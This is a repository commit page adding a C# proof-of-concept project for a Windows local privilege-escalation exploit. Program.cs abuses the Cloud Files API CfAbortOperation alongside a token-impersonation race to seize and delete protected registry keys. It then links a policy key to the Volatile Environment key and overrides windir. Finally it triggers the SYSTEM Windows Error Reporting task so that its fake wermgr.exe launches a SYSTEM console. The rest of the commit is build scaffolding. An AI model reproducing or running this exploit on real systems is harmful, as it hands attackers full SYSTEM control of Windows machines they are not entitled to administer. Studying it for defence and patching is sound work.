Nightmare_Eclipse/MiniPlasma
1
5
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Upload files to "PoC_AbortHydration_ArbitraryRegKey_EoP"

Browse Source
This commit is contained in:
Church of Malware 2026-06-10 01:02:32 +00:00
parent 59051080d9
commit 4f2501d1d5
5 changed files with 700 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

186
PoC_AbortHydration_ArbitraryRegKey_EoP/FodyWeavers.xsd Normal file
View File

@ -0,0 +1,186 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
<xs:element name="Weavers">
<xs:complexType>
<xs:all>
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:all>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeRuntimes" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtimes to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeRuntimes" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtimes names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>Obsolete, use UnmanagedWinX86Assemblies instead</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="UnmanagedWinX86Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged X86 (32 bit) assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>Obsolete, use UnmanagedWinX64Assemblies instead.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="UnmanagedWinX64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged X64 (64 bit) assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="UnmanagedWinArm64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged Arm64 (64 bit) assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
</xs:all>
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeRuntimeReferences" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if runtime assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="UseRuntimeReferencePaths" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls whether the runtime assemblies are embedded with their full path or only with their assembly name.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCleanup" type="xs:boolean">
<xs:annotation>
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableEventSubscription" type="xs:boolean">
<xs:annotation>
<xs:documentation>The attach method no longer subscribes to the `AppDomain.AssemblyResolve` (.NET 4.x) and `AssemblyLoadContext.Resolving` (.NET 6.0+) events.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>Obsolete, use UnmanagedWinX86Assemblies instead</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="UnmanagedWinX86Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged X86 (32 bit) assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>Obsolete, use UnmanagedWinX64Assemblies instead</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="UnmanagedWinX64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged X64 (64 bit) assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="UnmanagedWinArm64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged Arm64 (64 bit) assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:all>
<xs:attribute name="VerifyAssembly" type="xs:boolean">
<xs:annotation>
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
<xs:annotation>
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="GenerateXsd" type="xs:boolean">
<xs:annotation>
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:schema>

125
PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj Normal file
View File

@ -0,0 +1,125 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\packages\Costura.Fody.6.2.0\build\Costura.Fody.props" Condition="Exists('..\packages\Costura.Fody.6.2.0\build\Costura.Fody.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}</ProjectGuid>
<OutputType>Exe</OutputType>
<UseAppHost>true</UseAppHost>
<RootNamespace>PoC_AbortHydration_ArbitraryRegKey_EoP</RootNamespace>
<AssemblyName>PoC_AbortHydration_ArbitraryRegKey_EoP</AssemblyName>
<TargetFrameworkVersion>v4.8.1</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
<IsWebBootstrapper>false</IsWebBootstrapper>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
<TargetFrameworkProfile />
<PublishUrl>publish\</PublishUrl>
<Install>true</Install>
<InstallFrom>Disk</InstallFrom>
<UpdateEnabled>false</UpdateEnabled>
<UpdateMode>Foreground</UpdateMode>
<UpdateInterval>7</UpdateInterval>
<UpdateIntervalUnits>Days</UpdateIntervalUnits>
<UpdatePeriodically>false</UpdatePeriodically>
<UpdateRequired>false</UpdateRequired>
<MapFileExtensions>true</MapFileExtensions>
<ApplicationRevision>1</ApplicationRevision>
<ApplicationVersion>1.0.0.%2a</ApplicationVersion>
<UseApplicationTrust>false</UseApplicationTrust>
<PublishWizardCompleted>true</PublishWizardCompleted>
<BootstrapperEnabled>true</BootstrapperEnabled>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<ManifestCertificateThumbprint>0F28BB121C2D5CEE6A57C741514F51E5F2D9ECAD</ManifestCertificateThumbprint>
</PropertyGroup>
<PropertyGroup>
<ManifestKeyFile>PoC_AbortHydration_ArbitraryRegKey_EoP_TemporaryKey.pfx</ManifestKeyFile>
</PropertyGroup>
<PropertyGroup>
<GenerateManifests>true</GenerateManifests>
</PropertyGroup>
<PropertyGroup>
<SignManifests>true</SignManifests>
</PropertyGroup>
<ItemGroup>
<Reference Include="Costura, Version=6.2.0.0, Culture=neutral, PublicKeyToken=9919ef960d84173d, processorArchitecture=MSIL">
<HintPath>..\packages\Costura.Fody.6.2.0\lib\netstandard2.0\Costura.dll</HintPath>
</Reference>
<Reference Include="Microsoft.Win32.TaskScheduler, Version=2.12.1.0, Culture=neutral, PublicKeyToken=2806574b39b74d4b, processorArchitecture=MSIL">
<HintPath>..\packages\TaskScheduler.2.12.2\lib\net48\Microsoft.Win32.TaskScheduler.dll</HintPath>
</Reference>
<Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
<HintPath>..\packages\NtApiDotNet.1.1.33\lib\net461\NtApiDotNet.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.ComponentModel.Composition" />
<Reference Include="System.Core" />
<Reference Include="System.DirectoryServices" />
<Reference Include="System.Drawing" />
<Reference Include="System.IO.Compression.FileSystem" />
<Reference Include="System.Numerics" />
<Reference Include="System.Security" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<BootstrapperPackage Include=".NETFramework,Version=v4.7.2">
<Visible>False</Visible>
<ProductName>Microsoft .NET Framework 4.7.2 %28x86 and x64%29</ProductName>
<Install>true</Install>
</BootstrapperPackage>
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
<Visible>False</Visible>
<ProductName>.NET Framework 3.5 SP1</ProductName>
<Install>false</Install>
</BootstrapperPackage>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Import Project="..\packages\Fody.6.9.3\build\Fody.targets" Condition="Exists('..\packages\Fody.6.9.3\build\Fody.targets')" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\packages\Fody.6.9.3\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.6.9.3\build\Fody.targets'))" />
<Error Condition="!Exists('..\packages\Costura.Fody.6.2.0\build\Costura.Fody.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.6.2.0\build\Costura.Fody.props'))" />
<Error Condition="!Exists('..\packages\Costura.Fody.6.2.0\build\Costura.Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.6.2.0\build\Costura.Fody.targets'))" />
</Target>
<Import Project="..\packages\Costura.Fody.6.2.0\build\Costura.Fody.targets" Condition="Exists('..\packages\Costura.Fody.6.2.0\build\Costura.Fody.targets')" />
</Project>

13
PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj.user Normal file
View File

@ -0,0 +1,13 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<PublishUrlHistory>publish\</PublishUrlHistory>
<InstallUrlHistory />
<SupportUrlHistory />
<UpdateUrlHistory />
<BootstrapperUrlHistory />
<ErrorReportUrlHistory />
<FallbackCulture>en-US</FallbackCulture>
<VerifyUploadedFiles>false</VerifyUploadedFiles>
</PropertyGroup>
</Project>

369
PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs Normal file
View File

@ -0,0 +1,369 @@
using Microsoft.Win32;
using Microsoft.Win32.TaskScheduler;
using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Security.Cryptography;
using System.Security.Permissions;
using System.Threading;
namespace PoC_AbortHydration_ArbitraryRegKey_EoP
{
static class Program
{
static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
{
Console.WriteLine("Opening for {0}", desired_access);
using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
{
using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
{
if (key.IsSuccess)
return key.Result.Duplicate();
}
using (var imp = NtThread.Current.ImpersonateAnonymousToken())
{
return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
}
}
}
static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
{
var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
key.SetSecurityDescriptor(sd, info);
}
static void ForceKeyDeleteKey(NtKey root, string name)
{
Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
{
Console.WriteLine("Opened for WriteDac");
SetSecurityDescriptor(key, SecurityInformation.Dacl);
}
using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
{
Console.WriteLine("Opened for WriteOwner");
SetSecurityDescriptor(key, SecurityInformation.Label);
}
using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
{
Console.WriteLine("Opened for enumerate.");
DeleteRegistryTree(new_key);
new_key.Delete();
}
}
static void DeleteRegistryTree(NtKey root)
{
foreach (var name in root.QueryKeys())
{
ForceKeyDeleteKey(root, name);
}
}
[Flags]
enum AbortHydrationFlags
{
None = 0,
Unblock = 1,
Block = 2,
}
[DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);
[StructLayout(LayoutKind.Sequential)]
struct CF_PLATFORM_INFO
{
public int BuildNumber;
public int RevisionNumber;
public int IntegrationNumber;
}
[DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
static extern int CfGetPlatformInfo(
out CF_PLATFORM_INFO PlatformVersion
);
static void ForceTokenThread(object obj)
{
try
{
using (var thread = (NtThread)obj)
{
Console.WriteLine("In force token thread {0}", thread);
using (var token = TokenUtils.GetAnonymousToken())
{
while (true)
{
thread.SetImpersonationToken(token);
thread.SetImpersonationToken(null);
}
}
}
}
catch(ThreadAbortException)
{
return;
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
const string TARGET_KEY = @"\Registry\User\.DEFAULT\Volatile Environment";
static void CheckKeyThread(object root_key)
{
string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
try
{
using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
{
while (true)
{
if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
{
Console.WriteLine("Change detected.");
Environment.Exit(0);
break;
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
static int Check(this int hr)
{
if (hr < 0)
Marshal.ThrowExceptionForHR(hr);
return hr;
}
const int MAX_STAGE = 4;
static void Stage0()
{
for (int i = 1; i < MAX_STAGE; ++i)
{
Win32ProcessConfig config = new Win32ProcessConfig
{
CommandLine = $"run {i}",
ApplicationName = typeof(Program).Assembly.Location,
TerminateOnDispose = true
};
using (var p = Win32Process.CreateProcess(config))
{
if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
{
throw new ArgumentException($"Failed to run stage {i}");
}
}
}
}
static void Stage1(bool root_key)
{
Thread check_key_th = new Thread(CheckKeyThread);
check_key_th.IsBackground = true;
check_key_th.Start(root_key);
Thread.Sleep(1000);
var th = NtThread.OpenCurrent();
var anon_thread = new Thread(ForceTokenThread)
{
IsBackground = true
};
anon_thread.Start(th);
while (true)
{
CfAbortOperation(NtProcess.Current.ProcessId,
IntPtr.Zero, AbortHydrationFlags.Block);
}
}
static void Stage2()
{
using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
{
SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
DeleteRegistryTree(key);
}
NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
Stage1(false);
}
static void Stage3()
{
using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
{
Console.WriteLine("Cleaning up link {0}", key.FullPath);
key.Delete();
}
using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
{
SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
}
var key2 = Registry.Users.OpenSubKey(@".DEFAULT\Volatile Environment", RegistryRights.FullControl);
foreach(var subkey in key2.GetSubKeyNames())
{
var fullsubkey = TARGET_KEY + @"\" + subkey;
Console.WriteLine("Cleaning up subkey {0}", fullsubkey);
NtKey _subkey;
try
{
_subkey = NtKey.Open(fullsubkey, null, KeyAccessRights.WriteDac);
}
catch (Exception ex)
{
_subkey = OpenKey(null, fullsubkey, KeyAccessRights.WriteDac);
}
SetSecurityDescriptor(_subkey, SecurityInformation.Dacl);
_subkey.Close();
_subkey = NtKey.Open(fullsubkey, null, KeyAccessRights.Delete);
_subkey.Delete();
_subkey.Close();
}
key2.Close();
using(NtKey ntarget = NtKey.Open(TARGET_KEY,null,KeyAccessRights.SetValue))
{
ntarget.SetValue("windir", Path.GetDirectoryName(Process.GetCurrentProcess().MainModule.FileName));
}
string fakesys32 = Path.GetDirectoryName(Process.GetCurrentProcess().MainModule.FileName) + @"\System32";
Directory.CreateDirectory(fakesys32);
string fakewer = fakesys32 + @"\wermgr.exe";
File.Copy(Process.GetCurrentProcess().MainModule.FileName, fakewer, true);
var srvnamedpipe = new NamedPipeServerStream("MiniPlasmaWERPipe");
System.Threading.Tasks.Task pipewait = srvnamedpipe.WaitForConnectionAsync();
using (TaskService tasksvc = new TaskService())
{
Task wertask = tasksvc.GetTask(@"\Microsoft\Windows\Windows Error Reporting\QueueReporting");
wertask.Run();
wertask.Dispose();
}
if(!pipewait.Wait(2000))
{
Console.WriteLine("Exploit failed.");
}
else
{
Console.WriteLine("Exploit succeeded.");
}
srvnamedpipe.Dispose();
Thread.Sleep(1000);
try
{
File.Delete(fakewer);
Directory.Delete(fakesys32);
}
catch (Exception ex)
{ }
using (NtKey ntarget = NtKey.Open(TARGET_KEY, null, KeyAccessRights.Delete))
{
ntarget.Delete(false);
}
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetNamedPipeServerSessionId(IntPtr Pipe, out UInt32 ClientProcessId);
static void Main(string[] args)
{
bool isSystem;
using (var identity = System.Security.Principal.WindowsIdentity.GetCurrent())
{
isSystem = identity.IsSystem;
}
if (isSystem)
{
Environment.SetEnvironmentVariable("windir", @"C:\Windows",EnvironmentVariableTarget.Process);
var namedpipeclient = new NamedPipeClientStream("MiniPlasmaWERPipe");
namedpipeclient.Connect();
UInt32 nSesID;
IntPtr hPipe = namedpipeclient.SafePipeHandle.DangerousGetHandle();
if (!GetNamedPipeServerSessionId(hPipe, out nSesID))
return;
namedpipeclient.Dispose();
NtToken token = NtToken.OpenEffectiveToken();
NtToken token2 = token.DuplicateToken();
token.Dispose();
token = token2;
token.SetSessionId(((int)nSesID));
Win32Process.CreateProcessAsUser(token, @"C:\Windows\System32\conhost.exe", "", CreateProcessFlags.None, null);
return;
}
try
{
CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();
if (args.Length <= 1)
{
int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
switch (stage)
{
case 0:
Stage0();
break;
case 1:
Stage1(true);
break;
case 2:
Stage2();
break;
case 3:
Stage3();
break;
default:
throw new ArgumentException("Erm?");
}
}
else
{
using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
{
using (var imp = token.Impersonate())
{
CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
}
}

7
PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config Normal file
View File

@ -0,0 +1,7 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="Costura.Fody" version="6.2.0" targetFramework="net472" developmentDependency="true" />
<package id="Fody" version="6.9.3" targetFramework="net472" developmentDependency="true" />
<package id="NtApiDotNet" version="1.1.33" targetFramework="net481" />
<package id="TaskScheduler" version="2.12.2" targetFramework="net481" />
</packages>